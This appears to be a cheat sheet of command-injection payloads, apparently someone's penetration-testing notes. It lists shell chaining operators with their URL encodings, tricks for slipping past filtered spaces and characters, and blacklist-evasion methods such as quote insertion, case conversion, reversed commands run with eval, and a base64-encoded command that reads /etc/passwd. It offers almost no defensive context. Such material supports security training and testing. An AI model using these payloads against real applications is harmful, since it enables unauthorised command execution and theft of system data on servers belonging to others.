command-injections

🔧 Injection Operators

🧪 Semicolon

;       %3b       # → Executes both commands (Linux & Windows)

🔃 New Line

\n      %0a       # → Executes both commands (Linux & Windows)

🖼️ Background

&       %26       # → Executes both commands (second output usually appears first)

🧵 Pipe

|       %7c       # → Executes both commands (only second output is shown)

🟢 AND Operator

&&      %26%26    # → Executes second command only if first succeeds (Linux & Windows)

🔴 OR Operator

||      %7c%7c     # → Executes second command only if first fails (Linux & Windows)

🌀 Sub-Shell (Linux Only)

``       %60%60        # → Sub-shell execution (Linux-only)
$()      %24%28%29     # → Sub-shell execution (Linux-only)

🐧 Linux - Filtered Character Bypass

🔍 View Environment Variables

printenv         # Displays all environment variables

⛓️ Space Bypass

%09             # Use tab instead of space
${IFS}          # Replaced with space/tab (Not usable in sub-shells)
{ls,-la}        # Commas replaced with spaces

🔀 Other Character Bypass

${PATH:0:1}               # Replaced with /
${LS_COLORS:10:1}         # Replaced with ;
$(tr '!-}' '"-~'<<<[)     # Shift character by one ([ -> \)

⛔ Blacklisted Command Bypass

✒️ Character Insertion

' or "    # Must be even number of quotes
$@ or \   # Linux only

🔠 Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")   # Lowercase conversion and execution
$(a="WhOaMi";printf %s "${a,,}")   # Another lowercase technique

🔄 Reversed Commands

echo 'whoami' | rev     # Reverse string
eval $(rev<<<'imaohw')  # Execute reversed command

📦 Encoded Commands

echo -n 'cat /etc/passwd | grep 33' | base64     # Encode with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) # Execute base64 encoded command

📦 Windows - Filtered Character Bypass

🔍 View Environment Variables (PowerShell)

Get-ChildItem Env:      # View all environment variables